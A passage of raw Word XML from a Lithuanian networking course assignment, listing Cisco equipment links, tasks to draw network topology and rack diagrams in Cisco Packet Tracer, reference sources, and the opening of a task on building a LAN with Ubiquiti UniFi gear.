                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-2960-plus-series-switches/data_sheet_c78-728003.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="30C27745" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="753E8811" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AF6E9CF"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Cisco RV160W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D74B14B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId144" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.cisco.com/c/en/us/products/routers/rv160w-wireless-ac-vpn-router/index.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="67308D53" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F6650A2" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03302408"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Cisco Catalyst 2970</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68E2FDD4" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId145" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.cisco.com/en/US/docs/switches/lan/catalyst2970/hardware/quick/guide/2970GSG2.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30F7D61D" w14:textId="23D98D88" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC6341" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UŽDUOTYS, KURIAS REIKA ATLKTI</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDEDAE" w14:textId="3E2A2A96" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudarykite ir pateikite fizinę tinklo topologiją nuotraukos formatu. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>šsaugokite programos</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>su kuria braiž</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>te, projekto failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3E935" w14:textId="4796F4AB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudarykite ir pateikite tinklo spintos (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00C70C05" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>network rack) brėžinį nuotraukos formatu</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>šsaugokite programos</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>su kuria braiž</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>te, projekto failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32464430" w14:textId="5E4AC98B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jūsų pasiūlytą topologiją sudarykite naudodami Cisco Packet Tracer program</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2A62D" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9DE3C9" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038953F" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Microsoft 365 Team (2019, rugsėjo 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Patarimai, kaip sudaryti savo tinklo diagramą. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId146">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25C27C36" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Lovinus, A. (2015, spalio 21). 5 Free Tools to Draw a Network Diagram. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Newegg + Business</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId147">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3123F3CB" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">15 Best Network Diagram Software &amp; Topology Mapper Tools (Free&amp;Paid). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Networks Training</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId148">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.networkstraining.com/best-network-diagram-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B4C73DC" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diagrams.net. Open source technology stack for building diagramming applications.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId149">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://app.diagrams.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F0592D7" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction to Packet Tracer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco Networking Academy. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId150">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23DF2CBB" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C3C79E" w14:textId="7622BC06" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00683BC8"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6</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKALAUS TINKLO SUDARYMAS PANAUDOJANT UBIQUITI UNIFI ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B21225" w14:textId="5AF8316D" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naudo</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>damiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pateiktu įrangos sąrašu pasiūly</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tinklo fizinę ir loginę topologiją.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="563"/>
        <w:gridCol w:w="4111"/>
        <w:gridCol w:w="5237"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0D947509" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21B4EFED" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35651716" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0233857B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
